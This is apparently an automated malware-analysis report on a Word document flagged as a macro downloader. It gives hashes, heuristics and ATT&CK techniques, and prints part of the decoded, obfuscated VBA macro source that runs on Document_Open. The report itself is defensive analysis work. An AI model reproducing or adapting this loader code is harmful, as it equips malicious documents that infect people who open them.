Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 50f26cc321183198…

MALICIOUS

Office (OLE)

183.0 KB Created: 2018-05-16 07:14:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 47e4f0b58a0bb4d73e476b8cc8011b22 SHA-1: babfbcd399d500a42fb4e0fb8fec18a0c11f20fd SHA-256: 50f26cc321183198881fdb6e5652bc0f8abcc522b31c06c420dc6e0591a99099
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a Microsoft Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening. The ClamAV heuristic also flags it as a downloader. While the VBA code is obfuscated, the presence of the Document_Open macro and the downloader heuristic strongly suggests the intent is to fetch and run a secondary payload. No specific family could be identified due to the obfuscation.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13205 bytes
SHA-256: a61e704674f9e04c2364b338428ffb6bdb09189cb1c8ca2bd66ed79862781eb2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function headwind(bishops, garrotto, actinism)
Dim aftergame As String
Dim bissextile As String
Dim indispose As LongPtr
Dim climactic As LongPtr
Dim possibility As LongPtr
Dim fusel As Variant
Dim snatch As LongPtr
Dim extractable As LongPtr
discipleship = tail \ 194
tail = Math.Round(239)
climactic = bishops
extractable = actinism
shend = Rnd(341)
snatch = garrotto
dearest = 36 + 48
 Pmt 0, dearest, 19055, 37789, 3

mainspring = adenanthera
indispose = 95 - 52 - 44
doctrinally ByVal indispose, _
climactic, _
snatch, extractable, _
possibility
tail = Rnd(352)
End Function
Function trypetidae(affectedly)
Dim otterhound As Byte
Dim translatable As String
Dim salyut As Byte
Dim blahs As String
#If (90 - 102 + 412 + 27 - 92 + 365) > ((17 - 86 + 389) - (77 - 23 + 486) * 1) And ((88 - 42 - 18) - (56 - 31 + 3)) * 2 < (Win64) Then
Dim paean As Variant
Dim polemics As LongPtr
elaine = 16 - 72 + 64
Dim compromise As LongPtr
Dim catholicon As Variant
Dim centennially As Variant
Dim grindery As LongPtr
Dim ebenaceae As Byte
ovate = VarPtr(polemics)
photostat = headwind(ovate, VarPtr(affectedly) + (84 - 44 - 32), elaine)
#ElseIf (101 - 119 + 418 + 56 - 56 + 300) > ((35 - 17 + 302) - (37 - 102 + 605) * 1) And Not ((58 - 2 - 28) - (110 - 35 - 47)) * 2 < (Win64) Then
Dim polemics As Long
elaine = 57 - 19 - 34
Dim compromise As Long
Dim grindery As Long
ovate = VarPtr(polemics)
photostat = tripping(ovate, VarPtr(affectedly) + (101 - 75 - 18), elaine)
#End If
undeservedly = 65 - 3 - 63
compromise = 66 - 17 - 49
severely = 73 - 53 - 20
grindery = 10 - 17 + 9444
camber = 35 - 14 + 4075
barilla = 103 - 42 + 3
dinnertime = valuer(ByVal undeservedly, _
compromise, ByVal severely, grindery, ByVal camber, _
ByVal barilla)
shend = Fix(116)

oxygenase = "allodial"

#If (18 - 13 + 395 + 20 - 128 + 408) > ((2 - 74 + 392) - (13 - 20 + 547) * 1) And ((23 - 51 + 56) - (27 - 88 + 89)) * 2 < (Win64) Then
nidulariales = headwind(compromise, polemics, 107 - 28 + 5804)
#ElseIf (31 - 11 + 380 + 69 - 23 + 254) > ((97 - 112 + 335) - (29 - 43 + 554) * 1) And Not ((48 - 88 + 68) - (111 - 17 - 66)) * 2 < (Win64) Then
hypertensive = tripping(compromise, polemics, 106 - 96 + 5873)
#End If
micrometeoric = 19 + 13
 Pmt 0, micrometeoric, 25720, 50442, 3

trypetidae = compromise
End Function
Sub RemovePageNumbersFromCurrentSection()
    Dim ThisHeader As HeaderFooter
    Dim ThisPageNumber As PageNumber
    With Selection.Sections(1)
        For Each ThisHeader In .Headers
            For Each ThisPageNumber In ThisHeader.PageNumbers
                ThisPageNumber.Delete
            Next ThisPageNumber
        Next ThisHeader
    End With
End Sub

Function tripping(blacktopped, circus, lanky)
Dim abundance As Long
Dim carped As Integer
Dim photoelectrically As Long
Dim sago As Byte
Dim saipan As Long
Dim bottomlessness As Long
Dim aeonium As Long
Dim obliterated As Byte
Dim salable As Long
Dim doxepin As Variant
Dim blameworthy As Long
aeroplanist = Rnd(127)
adenanthera = "exigency"
abundance = blacktopped
salable = lanky
discipleship = Fix(414)
saipan = circus
corners = 19 + 3
 Pmt 0, corners, 27439, 57255, 2

tail = Rnd(424)
photoelectrically = 62 - 31 - 32
doctrinally ByVal photoelectrically, abundance, saipan, salable, aeonium
tail = Fix(483)
End Function
Sub bicephalous()
Dim attentively As Long
Dim chartism As Long
wake.condylar.Value = Day(#12/5/2013#)
varday = scaramouch = "marattiaceae"
party = "gysart"
bickering = "orycteropus"
comically = "blows"
crackloo = "crosse"

dispraise = congenialness
palanquin = "ampulla"
Set departer = wake.condylar.SelectedItem
scotch = 3 + 59
 Pmt 0, scotch, 23121, 25463, 3

laryngeal = departer.Name
query = 68 - 88 + 7864
... (truncated)